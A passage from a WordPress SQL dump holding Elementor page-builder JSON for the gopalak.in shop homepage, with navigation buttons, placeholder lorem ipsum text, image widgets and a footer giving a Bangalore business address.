here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7971,1416,'_elementor_page_assets','a:0:{}'),(7974,1417,'_elementor_edit_mode','builder'),(7975,1417,'_elementor_template_type','wp-page'),(7976,1417,'_elementor_version','3.7.6'),(7977,1417,'_wp_page_template','elementor_canvas'),(7978,1417,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f527d10\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"7899f3f\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"8274f01\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"0f6b27e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"e70a66d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"ae8a1a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"fd8def6\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"91ca2f8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a36dcd9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"125f124\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"508fa7c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4ddf161\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"p\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36cae65\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"size\":\"xs\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"152\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(7979,1417,'_elementor_page_assets','a:0:{}'),(7981,1418,'_elementor_edit_mode','builder'),(7982,1418,'_elementor_template_type','wp-page'),(7983,1418,'_elementor_version','3.7.6'),(7984,1418,'_wp_page_template','elementor_canvas'),(7985,1418,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7fab8ef\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"stretch_section\":\"section-stretched\",\"structure\":\"22\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-55,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"284\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"728be13\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":92.108999999999995},\"elements\":[{\"id\":\"0ea21e0\",\"elType\":\"widget\",\"settings\":{\"title\":\"Lorem Ipsum is simply dummy tex \",\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Saira Stencil One\",\"typography_font_size\":{\"unit\":\"px\",\"size\":22,\"sizes\":[]},\"typography_font_weight\":\"100\",\"text_stroke_text_stroke_type\":\"yes\",\"text_stroke_text_stroke\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"text_stroke_stroke_color\":\"#FFFFFF\",\"text_shadow_text_shadow_type\":\"yes\",\"text_shadow_text_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"color\":\"rgba(68.25, 44.95597826086957, 44.95597826086957, 0.3)\"},\"_margin\":{\"unit\":\"px\",\"top\":\"1\",\"right\":\"122\",\"bottom\":\"0\",\"left\":\"423\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"21726cb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"3\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98f9256\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":7.1929999999999996},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5b7eb71\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":664,\"sizes\":[]},\"structure\":\"30\",\"margin\":{\"unit\":\"px\",\"top\":\"-62\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"3e91b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1976daf\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"407c3fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"1473cd0\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"caccabd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"gradient\",\"background_color\":\"#477D50\",\"background_color_b\":\"#A7D6AD\",\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"2\",\"bottom\":\"2\",\"left\":\"2\",\"isLinked\":true}},\"elements\":[{\"id\":\"7382c00\",\"elType\":\"widget\",\"settings\":{\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, \",\"title_color\":\"#FFFFFF\",\"description_color\":\"#E9E9E9\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f78ed1a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"39b0f4e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e9c825a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":125,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"62f5f76\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\"},\"elements\":[{\"id\":\"a2fa7af\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4e1ad\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"caa5378\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"750\",\"left\":\"100\",\"isLinked\":false}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"acb2826\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#C2DEB9\",\"margin\":{\"unit\":\"px\",\"top\":\"-458\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"84a32d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"89a82b4\",\"elType\":\"widget\",\"settings\":{\"title\":\"LATEST NEWS\",\"align\":\"center\",\"title_color\":\"#174725\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"36bc667\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":740,\"sizes\":[]},\"structure\":\"40\"},\"elements\":[{\"id\":\"bb02c40\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"0769ef1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"75ce5f9\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text 